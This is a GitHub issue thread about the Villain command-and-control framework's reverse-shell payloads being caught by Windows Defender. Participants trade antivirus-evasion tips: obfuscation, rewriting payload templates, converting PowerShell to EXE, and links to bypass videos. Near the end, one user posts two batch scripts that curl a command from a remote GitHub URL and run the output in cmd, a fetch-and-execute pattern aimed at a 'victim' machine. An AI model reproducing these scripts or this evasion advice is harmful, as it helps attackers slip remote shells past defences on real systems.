t3l3machus / Villain

Villain is a high level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibling servers (Villain instances running on different machines).
Other
3.77k stars 611 forks source link

Villain gets detected by windows defender #15

Closed edikiuspy closed 5 months ago

edikiuspy commented 1 year ago

image I used obfuscate option but still got detected.

keralahacker commented 1 year ago

image Using obfuscate option getting detected

anonyvietofficial commented 1 year ago

same issus

t3l3machus commented 1 year ago

I made a small update in the payload templates and it seems to do the trick again (for now). You should not expect this to last forever (by this or any other tool), the obfuscate function is there to assist you, not to do the job for you.

I will try to update the templates and improve the general functionality of Villain in time but there will be ups and downs, it's inevitable. I encourage you to look into AV evasion techniques both manually and by using automated tools, you can start by checking this repo out -> https://github.com/sinfulz/JustEvadeBro or some of the videos I've made.

image

t3l3machus commented 1 year ago

I am intentionally leaving this open indefinitely.

edikiuspy commented 1 year ago

@t3l3machus unfortunately with new windows defender update same issue again

gaalos commented 1 year ago

You might "cypher" de string unsing key ?

t3l3machus commented 1 year ago

I made a video to give you ideas on how to bypass detection. I can update the templates or the auto-obf function but it's not worth it. https://www.youtube.com/watch?v=FVbdZSGkzhs

edikiuspy commented 1 year ago

Thank you for response. Your tool is very useful and great work!

t3l3machus commented 1 year ago

@edikiuspy thank you :))

gaalos commented 1 year ago

@t3l3machus Nicely done for your explain. Maybe you can use : image in your can obfuscate it by changing variable names. Add OR AND conditions automaticly ? :) The goal here is to not touch the payload generated ;)

t3l3machus commented 1 year ago

@gaalos That was the goal at the beginning. It doesn't matter how complicated i make it, it will just keep getting flagged and at some point the payload will be burned. I have tried many other tricks (including various string operations, adding logical operators here and there, it doesn't work).

gaalos commented 1 year ago

@t3l3machus yes it's true ^^. Maybe create payload without powershell as binary file ?

t3l3machus commented 1 year ago

@gaalos yeah i have already done it! I will update soon with an additional windows cmd payload template

gaalos commented 1 year ago

@t3l3machus Thx for your work ! Your code make me happy ton explain somes risk to my students :=)

rikda commented 1 year ago

image

detected by AV

dmcxblue commented 1 year ago

@rikda It will eventually get detected, you need to apply your own magic to bypass.

aksrivastava commented 1 year ago

if you want to bypass defender please try these techniques

https://youtu.be/EZOW40S_cTM

gaalos commented 1 year ago

@t3l3machus when did you do the update about "

Maybe create payload without powershell as binary file ?

Hey @t3l3machus when did you update it with binary payload ? :p

t3l3machus commented 1 year ago

@gaalos haven;t done such update and don't intent to. Other things are in order for Villain (after i release a new tool probably next Monday) :)

Envincion commented 1 year ago

@gaalos haven;t done such update and don't intent to. Other things are in order for Villain (after i release a new tool probably next Monday) :)

For me its still working like a charm ,but im wondring if there's a way to fix the payload to be able to work on OS Windows 8.1 ,it giving me this image

aksrivastava commented 1 year ago

convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share

Envincion commented 1 year ago

convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share

Thank you for your replay, but unfortunately converting ps to exe doesn't help to get the reverse shell working it works on widows 10 - 11 - server 2018 , but not ( Windows 8.1 )

gaalos commented 1 year ago

convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share

not working because it's just executing script, not a real BINARY/EXE File :)

UdayA6796 commented 1 year ago

Does someone have the older version of villain? if yes can you guys send the file here pls

F0rW0rk1 commented 1 year ago

The last version of Villain still gets detected by windows defender. The obfustacte function doesn't work for the netcat templates, i got this error "Ignoring unsupported arguments: OBFUSCATE" and add the obfuscate attrinut doesn't work either. Does someone how i can make this work ?

gaalos commented 1 year ago

Hey all i use something like curl to ... and it's work Thx to chatGPT

run.bat ` @echo off

REM Remplacez l'URL par celle que vous souhaitez appeler set "url=https://raw.githubusercontent.com/gaalos/dontdo/main/run-http"

REM Effectue la requête curl à partir de l'URL et stocke la sortie dans une variable for /f "usebackq delims=" %%i in (curl %url%) do set "curl_output=%%i"

REM Exécute la sortie de la variable comme une commande cmd /k %curl_output%

REM Terminer le script exit `

or ` @echo off

REM Remplacez l'URL par celle que vous souhaitez appeler set "url=https://raw.githubusercontent.com/gaalos/dontdo/main/run"

REM Effectue la requête curl à partir de l'URL et stocke la sortie dans une variable for /f "usebackq delims=" %%i in (curl %url%) do set "curl_output=%%i"

REM Exécute la sortie de la variable comme une commande start /B cmd /k %curl_output%

REM Terminer le script exit `

@t3l3machus Maybe you can try to create cmd/powreshell base on curl call ? Obviously the "victim" need to get grant access to the external url